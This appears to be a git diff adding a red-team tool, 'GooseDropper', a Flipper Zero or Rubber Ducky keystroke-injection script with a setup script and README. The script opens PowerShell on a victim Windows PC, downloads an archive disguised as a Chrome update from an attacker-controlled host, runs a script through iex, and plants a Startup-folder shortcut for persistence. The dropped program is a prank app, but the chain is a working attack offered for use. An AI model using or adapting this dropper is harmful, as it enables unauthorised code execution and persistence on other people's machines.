Merge branch 'master' into GooseDropper_V2.0

Duckyscripts/GooseDropper/GooseDropper.txt

@@ -0,0 +1,23 @@
+REM TITLE GooseDropper
+REM AUTHOR Fr3ki
+REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
+ENTER
+DELAY 8000
+GUI r
+DELAY 500
+STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
+ENTER
+DELAY 3000
+GUI r
+DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
+STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
+ENTER

Duckyscripts/GooseDropper/PersistentGoose.ps1

@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()

Duckyscripts/GooseDropper/README.md

@@ -0,0 +1,33 @@
+**======= Goose Dropper v2.0 ========**
+
+This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
+
+------------------------------------------------------------------------------------------------------
+
+------------------------------------------------------------------------------------------------------
+
+Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
+    
+    1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
+    
+    2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update.
+
+    3) Copy PersistentGoose.ps1 into the newly renamed Update folder.
+   
+    4) Re-ZIP the Update directory and name it Chrome_Updater.
+    
+    5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice).
+    
+    6) Copy to your Flipper or Rubber-Ducky and PWN!
+
+--------------------------------------------------------------------------------------------------------------
+**Important Notes:**
+
+Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
+
+All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
+
+**=== v2.0 Notes ==**
+    Added persistence via a PowerShell script that makes a shortcut in the startup folder.
+    Revamped updater with more options and better dialogue. 
+    Bugfixes to ensure payloads get delivered successfully.

Duckyscripts/GooseDropper/linux_setup.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+
+#Determine the source of the DesktopGoose download
+echo "1) Local Webserver | 2) Persistant URL"
+
+read -p "Select a download source [1/2]: " DL
+
+if [ "${DL}" == "1" ];
+then
+	echo "Grabbing your IP"
+
+	#Grab your local IP to add to the payload
+	SRC="$(ip route show | grep default | cut -d ' ' -f 9)"
+	
+	#Add your IP to the payload
+	sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt
+	
+	sleep 5s && clear
+
+elif [ "${DL}" == "2" ];
+then
+	#Get your URL
+	read -p "Enter your URL: " SRC
+
+	#Add your URL to the payload
+	sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
+	
+	#Remind users to have the zip ready
+	echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
+
+	sleep 5s && clear
+
+else
+	echo "Please enter a valid selection"
+	exit
+
+fi
+
+#Check if Desktop Goose is present in this directory
+GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
+
+if [ "${GOOSE}" == "" ];
+then
+	echo "Desktop Goose is not present in this directory, download it, or move it here"
+	exit
+
+else
+	unzip "Desktop Goose v0.31.zip"
+	mv "Desktop Goose v0.31/DesktopGoose v0.31" Update
+	mv PersistentGoose.ps1 Update/
+	zip -r Chrome_Update.zip Update
+	rm -rf "Desktop Goose v0.31"* Update
+	clear
+fi
+
+read -p "Configure Persistence? [Y/N]: " PERSIST
+
+if [ "${PERSIST,,}" == "n" ];
+then
+	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
+else
+	break
+fi
+
+if [ "${DL}" == "1" ];
+then
+	clear
+	read -p "Configuration finished! Start python webserver now? [Y/N]: " START
+	clear
+else
+	clear
+	break
+fi
+
+if [ "${START,,}" == "y" ];
+then
+	echo "Starting Server... Happy PWNing! (don't be a skid)"
+	python3 -m http.server 1337 && echo "PWNED!"
+else
+	clear
+	echo "Finished... Happy PWNing! (don't be a skid)!"
+fi

README.md

@@ -1,2 +1,6 @@
 # Misadventures
-Red/Purple-Team tools
+This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
+
+Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
+
+Licence: https://www.gnu.org/licenses/gpl-3.0.html